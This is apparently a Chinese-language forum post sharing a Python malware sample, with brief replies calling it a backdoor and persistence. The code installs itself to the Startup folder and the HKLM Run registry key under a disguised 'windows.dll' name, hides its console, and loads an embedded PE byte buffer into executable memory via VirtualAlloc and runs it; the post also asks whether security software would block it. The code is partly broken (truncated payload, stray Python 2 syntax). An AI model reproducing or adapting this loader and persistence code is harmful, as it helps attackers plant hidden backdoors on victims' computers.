某py样本分享
看样本,这个生成出来的要被防护软件拦吧。
# -*- coding:utf-8 -*-
from ctypes import *
import ctypes
import re
import struct
import string
import binascii
import win32con
import win32api
import os
import sys
import pythoncom
import win32com.client as client
import hashlib
import time
def createShortCut(filename): # 目前创建的无起始位置 - No starting position currently created
"""filename should be abspath, or there will be some strange errors"""
try:
# 设置快捷方式的起始位置,此处设置为windows启动目录 - Set the starting position of the shortcut, here is set to the windows startup directory
working_directory = os.getenv(
'USERPROFILE') + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\'
# 创建快捷方式的目标绝对路径 - The absolute path of the target to create the shortcut
lnkname = working_directory + filename + '.lnk'
# 要创建快捷方式的文件的绝对路径,此处是获取当前路径 - The absolute path of the file to create the shortcut, here is the current path
filename = os.path.dirname(os.path.realpath(sys.argv[0])) + '\\' + filename
shortcut = client.Dispatch("WScript.Shell").CreateShortCut(lnkname)
shortcut.TargetPath = filename
shortcut.save()
print('配置开机自启') # Configure auto start
except Exception as e:
print(e.args)
def set_shortcut(filename): # 如无需特别设置图标,则可去掉iconname参数 - If you don’t need to set the icon, you can remove the iconname parameter
print(filename)
try:
from win32com.shell import shell
from win32com.shell import shellcon
iconname = ""
# 设置快捷方式的起始位置,此处设置为windows启动目录 - Set the starting position of the shortcut, here is set to the windows startup directory
working_directory = os.getenv(
'USERPROFILE') + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\'
# 创建快捷方式的目标绝对路径 - The absolute path of the target to create the shortcut
lnkname = working_directory + filename + '.lnk'
print(lnkname)
# 要创建快捷方式的文件的绝对路径,此处是获取当前路径 - The absolute path of the file to create the shortcut, here is the current path
#filename = os.path.dirname(os.path.realpath(sys.argv[0])) + '\\' + filename
shortcut = pythoncom.CoCreateInstance(
shell.CLSID_ShellLink, None,
pythoncom.CLSCTX_INPROC_SERVER, shell.IID_IShellLink)
#shortcut.SetPath(filename)
shortcut.SetPath(sys.argv[0])
# 设置快捷方式的起始位置, 不然会出现找不到辅助文件的情况 - Set the starting position of the shortcut, otherwise the auxiliary file will not be found
shortcut.SetWorkingDirectory(working_directory)
# 可有可无,没有就默认使用文件本身的图标 - Optional, if not, use the icon of the file itself by default
shortcut.SetIconLocation(iconname, 0)
if os.path.splitext(lnkname)[-1] != '.lnk':
lnkname += ".lnk"
shortcut.QueryInterface(pythoncom.IID_IPersistFile).Save(lnkname, 0)
return True
except Exception as e:
print(e.args)
return False
def addfile2autorun(name):
try:
runpath = "Software\Microsoft\Windows\CurrentVersion\Run"
hKey = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, runpath, 0, win32con.KEY_SET_VALUE)
win32api.RegSetValueEx(hKey, name, 0, win32con.REG_SZ, sys.argv[0])
win32api.RegCloseKey(hKey)
except Exception as e:
pass
def executable_code(buffer):
buf = c_char_p(buffer)
size = len(buffer)
addr = libc.valloc(size)
addr = c_void_p(addr)
if 0 == addr:
raise Exception("Failed to allocate memory")
memmove(addr, buf, size)
if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
raise Exception("Failed to set protection on buffer")
return addr
def main():
buf = b""
buf += b"\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5"
buf += b"\x81\xc3\x93\x45\x00\x00\xff\xd3\x81\xc3\x66\x62\x02"
buf += b"\x00\x53\x6a\x04\x50\xff\xd0\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x0e"
buf += b"\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
buf += b"\x54\x68\x69\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x20"
buf += b"\x63\x61\x6e\x6e\x6f\x74\x20\x62\x65\x20\x72\x75\x6e"
buf += b"\x20\x69\x6e\x20\x44\x4f\x53\x20\x6d\x6f\x64\x65\x2e"
buf += b"\x0d\x0d\x0a\x24\x00\x00\x00\x00\x00\x00\x00\x49\x9c"
buf += b"\x6e\x3a\x0d\xfd\x00\x69\x0d\xfd\x00\x69\x0d\xfd\x00"
buf += b"\x69\x4b\xac\xe1\x69\x29\xfd\x00\x69\x4b\xac\xdf\x69"
buf += b"\x1a\xfd\x00\x69\x4b\xac\xe0\x69\x8e\xfd\x00\x69\x0d"
buf += b"\xfd\x01\x69\xce\xfd\x00\x69\x04\x85\x93\x69\x1c\xfd"
buf += b"\x00\x69\x04\x85\x83\x69\x0c\xfd\x00\x69\x00\xaf\xe0"
buf += b"\x69\x17\xfd\x00\x69\x00\xaf\xdc\x69\x0c\xfd\x00\x69"
buf += b"\x00\xaf\xde\x69\x0c\xfd\x00\x69\x52\x69\x63\x68\x0d"
buf += b"\xfd\x00\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x50\x45\x00\x00\x4c\x01\x04\x00\x3c\x97\x52\x5f"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x02\x21\x0b"
buf += b"\x01\x0c\x00\x00\xf6\x01\x00\x00\xe6\x00\x00\x00\x00"
buf += b"\x00\x00\xaa\x38\x01\x00\x00\x10\x00\x00\x00\x10\x02"
bufmd5 = get_md5_value(buf)
set_shortcut("windows.dll-" + bufmd5)
addfile2autorun("windows.dll-" + bufmd5)
#libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
if 6669999999999999999999999999999999999==6669999999999999999999999999999999999:
ctypes.windll.user32.ShowWindow(whnd, 0)
ctypes.windll.kernel32.CloseHandle(whnd)
print ".................................."*666
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
buf,
ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
#进程不能退出 - Process cannot exit
while True:
time.sleep(1)
def get_md5_value(src):
myMd5 = hashlib.md5()
myMd5.update(src)
myMd5_Digest = myMd5.hexdigest()
return myMd5_Digest
if __name__ == '__main__':
main()
这是后门吗?
权限维持。。。